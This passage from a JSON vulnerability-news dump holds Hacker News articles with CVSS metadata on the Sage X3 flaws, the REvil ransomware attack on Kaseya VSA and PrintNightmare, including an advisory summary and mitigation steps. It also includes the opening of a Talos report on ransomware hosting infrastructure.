[said](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>). \"This can allow an attacker to run arbitrary operating system commands to create Administrator level users, install malicious software, and otherwise take complete control of the system for any purpose.\"\n\n[![Sage X3 Enterprise Management](https://thehackernews.com/images/-jQ30AM1BKTk/YObgpqqUBMI/AAAAAAAADIs/yUeM-dYpjsMVlO2etFKHLUeNqimy6uGrQCLcBGAsYHQ/s728-e1000/admin.jpg)](<https://thehackernews.com/images/-jQ30AM1BKTk/YObgpqqUBMI/AAAAAAAADIs/yUeM-dYpjsMVlO2etFKHLUeNqimy6uGrQCLcBGAsYHQ/s0/admin.jpg>)\n\nThe most severe of the issues is CVE-2020-7388, which takes advantage of an administrative service that's accessible over the internet to craft malicious requests with the goal of running arbitrary commands on the server as the \"NT AUTHORITY/SYSTEM\" user. The service in question is used for remote management of the Sage ERP solution through the Sage X3 Console.\n\nSeparately, the 'Edit' page associated with user profiles in the Sage X3 Syracuse web server component is vulnerable to a [stored XSS](<https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/>) attack (CVE-2020-7390), enabling the execution of arbitrary JavaScript code during '[mouseOver](<https://developer.mozilla.org/en-US/docs/Web/API/Element/mouseover_event>)' events in the 'First name', 'Last name', and 'Email' fields.\n\n\"If successful, however, this vulnerability could allow a regular user of Sage X3 to execute privileged functions as a currently logged-in administrator or capture administrator session cookies for later impersonation as a currently-logged-in administrator,\" the researchers said.\n\nSuccessful exploitation of CVE-2020-7387, on the other hand, results in the exposure of Sage X3 installation paths to an unauthorized user, while CVE-2020-7389 concerns a missing authentication in Syracuse development environments that could be used to gain code execution via command injection.\n\n\"Generally speaking, Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required,\" the researchers noted in the disclosure. \"Following this operational advice effectively mitigates all four vulnerabilities, though customers are still urged to update according to their usual patch cycle schedules.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T11:26:00", "type": "thn", "title": "Critical Flaws Reported in Sage X3 Enterprise Management Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388", "CVE-2020-7389", "CVE-2020-7390"], "modified": "2021-07-08T11:26:09", "id": "THN:071674FE55E0EC791A8A321B61E9ED63", "href": "https://thehackernews.com/2021/07/critical-flaws-reported-in-sage-x3.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![Kaseya](https://thehackernews.com/images/-amElwT4flB4/YOP-7QNm6uI/AAAAAAAADGc/CJfNcjNsvDcuA16PdqeS-uDGR5r9urDxgCLcBGAsYHQ/s728-e1000/kk.png)](<https://thehackernews.com/images/-amElwT4flB4/YOP-7QNm6uI/AAAAAAAADGc/CJfNcjNsvDcuA16PdqeS-uDGR5r9urDxgCLcBGAsYHQ/s0/kk.png>)\n\nU.S. technology firm Kaseya, which is firefighting the largest ever [supply-chain ransomware strike](<https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html>) on its VSA on-premises product, ruled out the possibility that its codebase was unauthorizedly tampered with to distribute malware.\n\nWhile initial reports raised speculations that REvil, the ransomware gang behind the attack, might have gained access to Kaseya's backend infrastructure and abused it to deploy a malicious update to VSA servers running on client premises, in a modus operandi similar to that of the devastating SolarWinds hack, it has since emerged that a never-before-seen security vulnerability ([CVE-2021-30116](<https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html>)) in the software was leveraged to push ransomware to Kaseya's customers.\n\n\"The attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution,\" the Miami-headquartered company [noted](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403584098961>) in the incident analysis. \"This allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to endpoints. There is no evidence that Kaseya's VSA codebase has been maliciously modified.\"\n\nIn other words, while successful zero-day exploitation on Kaseya VSA software by itself isn't a supply-chain attack, taking advantage of the exploit to compromise managed service providers (MSPs) and breach their customers would constitute as one.\n\nIt's, however, unclear as to how the hackers learned of the vulnerabilities. The details of those flaws have not yet been publicly released, although Huntress Labs [revealed](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) that \"Cybercriminals have exploited an arbitrary file upload and code injection vulnerability and have high confidence an authentication bypass was used to gain access into these servers.\"\n\n[![Kaseya Supply-Chain Attack](https://thehackernews.com/images/-M77M4RmcNEc/YOUxOS5ZdUI/AAAAAAAA4Sc/_p6iSb9UrLA1rb-HnPzBoLz2isflL5seACLcBGAsYHQ/s728-e1000/hack.jpg)](<https://thehackernews.com/images/-M77M4RmcNEc/YOUxOS5ZdUI/AAAAAAAA4Sc/_p6iSb9UrLA1rb-HnPzBoLz2isflL5seACLcBGAsYHQ/s0/hack.jpg>) \n--- \nImage Source: [Cybereason](<https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles>) \n \nAbout 60 MSPs and 1,500 downstream businesses around the world have been paralyzed by the ransomware attack, according to the company's CEO Fred Voccola, most of which have been small concerns, like dental practices, architecture firms, plastic surgery centers, and libraries.\n\nHackers associated with the Russia-linked REvil ransomware-as-a-service (RaaS) group initially demanded $70 million in Bitcoins to release a decryptor tool for restoring all the affected businesses' data, although they have swiftly [lowered the asking price](<https://twitter.com/jackhcable/status/1411906687968161792>) to $50 million, suggesting a willingness to negotiate their demands in return for a lesser amount.\n\n\"REvil ransomware has been advertised on underground forums for three years and it is one of the most prolific RaaS operations,\" Kaspersky researchers [said](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) Monday, adding \"the gang earned over $100 million from its operations in 2020.\"\n\nThe attack chain worked by first deploying a malicious dropper via a PowerShell script which was executed through Kaseya's VSA software.\n\n\"This script disables Microsoft Defender for Endpoint protection features and then uses the certutil.exe utility to decode a malicious executable (agent.exe) that drops a legitimate Microsoft binary (MsMpEng.exe, an older version of Microsoft Defender) and malicious library (mpsvc.dll), which is the REvil ransomware. This library is then loaded by the legitimate MsMpEng.exe by utilizing the [DLL side-loading technique](<https://attack.mitre.org/techniques/T1574/002/>),\" the researchers added.\n\nThe incident has also led the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to offer mitigation guidance, urging businesses to enable multi-factor authentication, limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T07:03:00", "type": "thn", "title": "Kaseya Rules Out Supply-Chain Attack; Says VSA 0-Day Hit Its Customers Directly", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-07T04:45:24", "id": "THN:6141B56028352C293B8E6D7F0948C55C", "href": "https://thehackernews.com/2021/07/kaseya-rules-out-supply-chain-attack.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![Kaseya Ransomware Attack](https://thehackernews.com/images/-f8hZ7faS3WM/YOKSzKtVz2I/AAAAAAAADF0/237EHKDFNXUqCMYdN9fj42yTQJBrh3hgwCLcBGAsYHQ/s728-e1000/Kaseya-Ransomware-Attack.jpg)](<https://thehackernews.com/images/-f8hZ7faS3WM/YOKSzKtVz2I/AAAAAAAADF0/237EHKDFNXUqCMYdN9fj42yTQJBrh3hgwCLcBGAsYHQ/s0/Kaseya-Ransomware-Attack.jpg>)\n\nAmidst the massive [supply-chain ransomware attack](<https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html>) that triggered an infection chain compromising thousands of businesses on Friday, new details have emerged about how the notorious Russia-linked REvil cybercrime gang may have pulled off the unprecedented hack.\n\nThe Dutch Institute for Vulnerability Disclosure (DIVD) on Sunday [revealed](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>) it had alerted Kaseya to a number of zero-day vulnerabilities in its VSA software (CVE-2021-30116) that it said were being exploited as a conduit to deploy ransomware. The non-profit entity said the company was in the process of resolving the issues as part of a coordinated vulnerability disclosure when the July 2 attacks took place.\n\nMore specifics about the flaws were not shared, but DIVD chair Victor Gevers [hinted](<https://twitter.com/0xDUDE/status/1411478505641099265>) that the zero-days are trivial to exploit. At least 1,000 businesses are said to have been affected by the attacks, with victims identified in no less than 17 countries, including the U.K., South Africa, Canada, Argentina, Mexico, Indonesia, New Zealand, and Kenya, according to ESET.\n\n[Kaseya VSA](<https://www.kaseya.com/products/vsa/>) is a cloud-based IT management and remote monitoring solution for managed service providers (MSPs), offering a centralized console to monitor and manage endpoints, automate IT processes, deploy security patches, and control access via two-factor authentication.\n\n### REvil Demands $70 Million Ransom\n\nActive since April 2019, [REvil](<https://attack.mitre.org/software/S0496/>) (aka Sodinokibi) is best known for [extorting $11 million](<https://thehackernews.com/2021/06/beef-supplier-jbs-paid-hackers-11.html>) from the meat-processor JBS early last month, with the ransomware-as-a-service business accounting for about 4.6% of attacks on the public and private sectors in the first quarter of 2021.\n\n[![Kaseya Ransomware Attack](https://thehackernews.com/images/-oQwtfWFbXgk/YOKQt59eU4I/AAAAAAAADFs/G_R8XpMYg5gFxQr92DRspWyHSHGoq2X5QCLcBGAsYHQ/s728-e1000/revil-ransomware-blog.jpg)](<https://thehackernews.com/images/-oQwtfWFbXgk/YOKQt59eU4I/AAAAAAAADFs/G_R8XpMYg5gFxQr92DRspWyHSHGoq2X5QCLcBGAsYHQ/s0/revil-ransomware-blog.jpg>)\n\nThe group is now asking for a record $70 million ransom payment to publish a universal decryptor that can unlock all systems that have been crippled by file-encrypting ransomware.\n\n\"On Friday (02.07.2021) we launched an attack on MSP providers. More than a million systems were infected. If anyone wants to negotiate about universal decryptor \u2013 our price is 70,000,000$ in BTC and we will publish publicly decryptor that decrypts files of all victims, so everyone will be able to recover from attack in less than an hour,\" the REvil group posted on their dark web data leak site.\n\n[![Kaseya Ransomware Attack](https://thehackernews.com/images/-yTpczL_Mlkc/YOKQZtNgobI/AAAAAAAADFk/Uu_gdoY-GkUBxnTqgzgX037GR1x8db-0ACLcBGAsYHQ/s728-e1000/ransomware-attack.jpg)](<https://thehackernews.com/images/-yTpczL_Mlkc/YOKQZtNgobI/AAAAAAAADFk/Uu_gdoY-GkUBxnTqgzgX037GR1x8db-0ACLcBGAsYHQ/s0/ransomware-attack.jpg>)\n\nKaseya, which has enlisted the help of FireEye to help with its investigation into the incident, [said](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>) it intends to \"bring our SaaS data centers back online on a one-by-one basis starting with our E.U., U.K., and Asia-Pacific data centers followed by our North American data centers.\"\n\nOn-premises VSA servers will require the installation of a patch prior to a restart, the company noted, adding it's in the process of readying the fix for release on July 5.\n\n### CISA Issues Advisory\n\nThe development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to [issue an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>), urging customers to download the [Compromise Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>) that Kaseya has made available to identify any indicators of compromise (IoC), enable multi-factor authentication, limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.\n\n\"Less than ten organizations [across our customer base] appear to have been affected, and the impact appears to have been restricted to systems running the Kaseya software,\" Barry Hensley, Chief Threat Intelligence Officer at Secureworks, told The Hacker News via email.\n\n\"We have not seen evidence of the threat actors attempting to move laterally or propagate the ransomware through compromised networks. That means that organizations with wide Kaseya VSA deployments are likely to be significantly more affected than those that only run it on one or two servers.\"\n\nBy compromising a software supplier to target MSPs, who, in turn, provide infrastructure or device-centric maintenance and support to other small and medium businesses, the development once again underscores the importance of securing the software supply chain, while also highlighting how hostile agents continue to advance their financial motives by combining the twin threats of supply chain attacks and ransomware to strike hundreds of victims at once.\n\n\"MSPs are high-value targets \u2014 they have large attack surfaces, making them juicy targets to cybercriminals,\" said Kevin Reed, chief information security officer at Acronis. \"One MSP can manage IT for dozens to a hundred companies: instead of compromising 100 different companies, the criminals only need to hack one MSP to get access to them all.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T05:22:00", "type": "thn", "title": "REvil Used 0-Day in Kaseya Ransomware Attack, Demands $70 Million Ransom", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-06T04:52:17", "id": "THN:5B336156927E228EFBD090418D063D2D", "href": "https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:27", "description": "[![FBI, CISA and Russian Hackers](https://thehackernews.com/new-images/img/a/AVvXsEi78Lgh1-a_Rlugh-jIjcQsT3okz4dkvUH1BpDGD2uThowKvsO7WgxJ7CzE9cAixe67YOA9inVSnZzZWhfA7bAV4ymALr-GCIvlvpRTka6rQROItUoRgAGIdaDtlEUPPeof7gjztGdh1UfjFIt_ps35SJsa5HNgqIppsi2kHJdv2NVQR31hMzFoIXUh=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEi78Lgh1-a_Rlugh-jIjcQsT3okz4dkvUH1BpDGD2uThowKvsO7WgxJ7CzE9cAixe67YOA9inVSnZzZWhfA7bAV4ymALr-GCIvlvpRTka6rQROItUoRgAGIdaDtlEUPPeof7gjztGdh1UfjFIt_ps35SJsa5HNgqIppsi2kHJdv2NVQR31hMzFoIXUh>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released a joint advisory warning that Russia-backed threat actors hacked the network of an unnamed non-governmental entity by exploiting a combination of flaws.\n\n\"As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default [multi-factor authentication] protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>).\n\n\"The actors then exploited a critical Windows Print Spooler vulnerability, 'PrintNightmare' ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>)) to run arbitrary code with system privileges.\"\n\nThe attack was pulled off by gaining initial access to the victim organization via compromised credentials \u2013 obtained by means of a brute-force password guessing attack \u2013 and enrolling a new device in the organization's [Duo MFA](<https://duo.com/product/multi-factor-authentication-mfa>).\n\nIt's also noteworthy that the breached account was un-enrolled from Duo due to a long period of inactivity, but had not yet been disabled in the NGO's Active Directory, thereby allowing the attackers to escalate their privileges using the PrintNightmare flaw and disable the MFA service altogether.\n\n\"As Duo's default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network,\" the agencies explained.\n\nTurning off MFA, in turn, allowed the state-sponsored actors to authenticate to the NGO's virtual private network (VPN) as non-administrator users, connect to Windows domain controllers via Remote Desktop Protocol (RDP), and obtain credentials for other domain accounts.\n\nIn the final stage of the attack, the newly compromised accounts were subsequently utilized to move laterally across the network to siphon data from the organization's cloud storage and email accounts.\n\nTo mitigate such attacks, both CISA and FBI are recommending organizations to enforce and review multi-factor authentication configuration policies, disable inactive accounts in Active Directory, and prioritize patching for [known exploited flaws](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T13:29:00", "type": "thn", "title": "FBI, CISA Warn of Russian Hackers Exploiting MFA and PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-16T13:29:45", "id": "THN:A52CF43B8B04C0A2F8413E17698F9308", "href": "https://thehackernews.com/2022/03/fbi-cisa-warn-of-russian-hackers.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![Microsoft Print Spooler Vulnerability](https://thehackernews.com/images/-J4q0IawSomE/YOSMoHyRjgI/AAAAAAAABHE/cP0YFHHZFtA9uluA4FTtUF6qLpRtEeAEgCLcBGAsYHQ/s728-e1000/Microsoft-PrintSpooler-Vulnerability.jpg)](<https://thehackernews.com/images/-J4q0IawSomE/YOSMoHyRjgI/AAAAAAAABHE/cP0YFHHZFtA9uluA4FTtUF6qLpRtEeAEgCLcBGAsYHQ/s0/Microsoft-PrintSpooler-Vulnerability.jpg>)\n\nThis week, **PrintNightmare** \\- Microsoft's Print Spooler vulnerability (CVE-2021-34527) was upgraded from a 'Low' criticality to a 'Critical' criticality.\n\nThis is due to a Proof of Concept published on GitHub, which attackers could potentially leverage for gaining access to Domain Controllers.\n\nAs we [reported earlier](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), Microsoft already released a patch in June 2021, but it wasn't enough to stop exploits. Attackers can still use Print Spooler when connecting remotely. You can find all you need to know about this vulnerability in this article and how you can mitigate it (and you can). \n\n**Print Spooler in a nutshell:** Print Spooler is Microsoft's service for managing and monitoring files printing. This service is among Microsoft's oldest and has had minimal maintenance updates since it was released. \n\nEvery Microsoft machine (servers and endpoints) has this feature enabled by default.\n\n**PrintNightmare vulnerability:** As soon as an attacker gains limited user access to a network, he will be able to connect (directly or remotely) to the Print Spooler. Since the Print Spooler has direct access to the kernel, the attacker can use it to gain access to the operating system, run remote code with system privileges, and ultimately attack the Domain Controller.\n\nYour best option when it comes to mitigating the PrintNightmare vulnerability is to disable the Print Spooler on every server and/or sensitive workstation (such as administrators' workstations, direct internet-facing workstations, and non-printing workstations).\n\nThis is what Dvir Goren's, hardening expert and CTO at [CalCom Software Solutions](<https://www.calcomsoftware.com/?utm_source=HN>), suggests as your first move towards mitigation.\n\nFollow these steps to disable the Print Spooler service on Windows 10:\n\n 1. Open Start.\n 2. Search for PowerShell, right-click on it and select the Run as administrator.\n 3. Type the command and press Enter: _Stop-Service -Name Spooler -Force_\n 4. Use this command to prevent the service from starting back up again during restart: Set-Service -Name Spooler -StartupType Disabled\n\nAccording to Dvir's experience, 90% of servers do not require Print Spooler. It is the default configuration for most of them, so it is usually enabled. As a result, disabling it can solve 90% of your problem and have little impact on production.\n\nIn large and complex infrastructures, it can be challenging to locate where Print Spooler is used.\n\nHere are a few examples where Print Spooler is required:\n\n 1. When using Citrix services,\n 2. Fax servers,\n 3. Any application requiring virtual or physical printing of PDFs, XPSs, etc. Billing services and wage applications, for example.\n\nHere are a few examples when Print Spooler is not needed but enabled by default:\n\n 1. Domain Controller and Active Directory \u2013 the main risk in this vulnerability can be neutralized by practicing basic cyber hygiene. It makes no sense to have Print Spooler enabled in DCs and AD servers. \n 2. Member servers such as SQL, File System, and Exchange servers. \n 3. Machines that do not require printing. \n\nA few other hardening steps suggested by Dvir for machines dependent on Print Spooler include:\n\n 1. Replace the vulnerable Print Spooler protocol with a non-Microsoft service. \n 2. By changing 'Allow Print Spooler to accept client connections', you can restrict users' and drivers' access to the Print Spooler to groups that must use it.\n 3. Disable Print Spooler caller in Pre-Windows 2000 compatibility group.\n 4. Make sure that Point and Print is not configured to No Warning \u2013 check registry key SOFTWARE/Policies/Microsoft/Windows NT/Printers/PointAndPrint/NoElevationOnInstall for DWORD value 1 and change it to 0.\n 5. Turn off EnableLUA \u2013 check registry key SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System/EnableLUA for DWORD value 0 and change it to 1.\n\nHere's what you need to do next to ensure your organization is secure:\n\n 1. Identify where Print Spooler is being used on your network. \n 2. Map your network to find the machines that must use Print Spooler.\n 3. Disable Print Spooler on machines that do not use it. \n 4. For machines that require Print Spooler \u2013 configure them in a way to minimize its attack surface. \n\nBeside this, to find potential evidence of exploitation, you should also monitor Microsoft-Windows-PrintService/Admin log entries. There might be entries with error messages that indicate Print Spooler can't load plug-in module DLLs, although this can also happen if an attacker packaged a legitimate DLL that Print Spooler demands.\n\nThe final recommendation from Dvir is to implement these recommendations through[ hardening automation tools](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=HN>). Without automation, you will spend countless hours attempting to harden manually and may end up vulnerable or causing systems to go down\n\nAfter choosing your course of action, a [Hardening automation tool](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=HN>) will discover where Print Spooler is enabled, where they are actually used, and disable or reconfigure them automatically.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T09:32:00", "type": "thn", "title": "How to Mitigate Microsoft Print Spooler Vulnerability \u2013 PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T15:05:22", "id": "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T07:58:10", "description": "[![Anonymized Ransomware Sites on Dark Web](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhW8mCPe27LdzHLP4ngj6tlt2Pg8kCf_fM8vePiD96oqVL7MUOW8zxZlXFGU1HvblavK2Xdcm0tf2j7r5qbvTV9iW1N9M95vbWmuFsGUq0MkEeY7rnkpeop76NG41Eys_CeiCVl0xS8l4E21-RosfCrVOTGYR8jNw1F5Q2v-OjF2MeqKfBbPn6bDseq/s728-e1000/ransomware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhW8mCPe27LdzHLP4ngj6tlt2Pg8kCf_fM8vePiD96oqVL7MUOW8zxZlXFGU1HvblavK2Xdcm0tf2j7r5qbvTV9iW1N9M95vbWmuFsGUq0MkEeY7rnkpeop76NG41Eys_CeiCVl0xS8l4E21-RosfCrVOTGYR8jNw1F5Q2v-OjF2MeqKfBbPn6bDseq/s728-e100/ransomware.jpg>)\n\nCybersecurity researchers have detailed the various measures ransomware actors have taken to obscure their true identity online as well as the hosting location of their web server infrastructure.\n\n\"Most ransomware operators use hosting providers outside their country of origin (such as Sweden, Germany, and Singapore) to host their ransomware operations sites,\" Cisco Talos researcher Paul Eubanks [said](<https://blog.talosintelligence.com/2022/06/de-anonymizing-ransomware-domains-on.html>). \"They use VPS hop-points as a proxy to hide their true location when they connect to their ransomware web infrastructure for remote administration tasks.\"\n\nAlso prominent are the use of the TOR network and DNS proxy registration services to provide an added layer of anonymity for their illegal operations.\n\nBut by taking advantage of the threat actors' operational security missteps and other techniques, the cybersecurity firm disclosed last week that it was able to identify TOR hidden services hosted on public IP addresses, some of which are previously unknown infrastructure associated with [DarkAngels](<https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/>), [Snatch](<https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch>), [Quantum](<https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware>), and [Nokoyawa](<https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa>) ransomware groups.\n\nWhile ransomware groups are known to rely on the dark web to conceal their illicit activities ranging from leaking stolen data to negotiating payments with victims, Talos disclosed that it was able to identify \"public IP addresses hosting the same threat actor infrastructure as those on the dark web.\"\n\n\"The methods we used to identify the public internet IPs involved matching threat actors' [self-signed] [TLS certificate](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>) serial numbers and page elements with those indexed on the public internet,\" Eubanks said.\n\n[![Anonymized Ransomware Sites on Dark 